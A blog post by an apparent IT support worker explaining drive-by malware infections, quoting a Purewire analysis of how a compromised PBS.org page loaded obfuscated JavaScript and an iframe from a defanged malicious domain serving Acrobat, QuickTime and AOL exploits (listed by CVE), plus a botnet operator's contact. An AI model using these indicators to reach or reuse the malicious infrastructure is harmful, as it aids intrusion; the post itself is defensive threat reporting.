Over the past few weeks I’ve seen a rise in calls from clients that got malware infections on their pc’s. They all ask the same thing, “how did I get infected, when I know better and don’t open attachments, and follow all those things everyone says your supposed to do to be safe”. I’ve had to explain that the latest way that the bad guys are using to get to your machine involves them using exploits to infect websites that people visit every day and use the legitimate website to infect your pc.
If what is occurring still doesn’t make sense to you, think of it this way –
No matter where you live, everyone has seen a news story about someone who shows up to a home dressed like the water company or cable company employee telling you that they need to access you house to check something or access your back yard to fix something and then once you let them in they do something like rob you (and hopefully that’s all they do). Well what is occurring in the computer world is the same thing.
The Pure wire blog (http://blog.purewire.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits (http://blog NULL.purewire NULL.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits)) has a story about PBS that occurred last week (and PBS has since fixed this) but this just shows how you could still get infected even with taking all the “best practices” precaution.
From the story:
On Monday of this week, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious activity originating from a page that belongs to the popular website pbs.org. Specifically, attempts to access certain PBS website pages yielded javascript that serves exploits from a malicious domain via an iframe.
A forensic analysis of this attack revealed that the user requested the following:
hxxp://www.pbs.org/parents/curiousgeorge
which in turn requested:
hxxp://dipsy.pbs.org/parents/ptframe/images/bground-leaderboard.jpg
instead of:
hxxp://www.pbs.org/parents/ptframe/images/bground-leaderboard.jpg
Accessing the image off of dipsy.pbs.org requires login credentials, as shown in the following screenshot.
PBS Login PromptIf correct credentials are not provided, dipsy.bps.org serves an error page that looks normal:
… until you look under the hood. The end of the error page’s source:
contains obfuscated javascript placed there by a malicious third party. Deobfuscated, this code writes an iframe that loads malicious javascript from the following malicious URL:
hxxp://qxfcuc.info/f.cgi?jzo
The above URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992 (http://cve NULL.mitre NULL.org/cgi-bin/cvename NULL.cgi?name=2008-2992), CVE-2009-0927 (http://cve NULL.mitre NULL.org/cgi-bin/cvename NULL.cgi?name=CVE-2009-0927), and CVE-2007-5659 (http://cve NULL.mitre NULL.org/cgi-bin/cvename NULL.cgi?name=CVE-2007-5659)), AOL Radio AmpX (CVE-2007-6250 (http://cve NULL.mitre NULL.org/cgi-bin/cvename NULL.cgi?name=CVE-2007-6250)), AOL SuperBuddy (CVE-2006-5820 (http://cve NULL.mitre NULL.org/cgi-bin/cvename NULL.cgi?name=CVE-2006-5820)) and Apple QuickTime (CVE-2007-0015 (http://cve NULL.mitre NULL.org/cgi-bin/cvename NULL.cgi?name=CVE-2007-0015)).
The domain qxfcuc.info is part of a malware campaign that includes tens of similar websites hosted off of a handful of common IP addresses. Similar exploit code was served from most of these domains, although a handful (e.g., yyoqny.info) display a message that suggests the criminal behind this campaign is compromising systems to build a botnet he will likely later lease. Translated from Russian, that message tells prospective leasers to "Send a message to ICQ #559156803; stats available under ststst02."
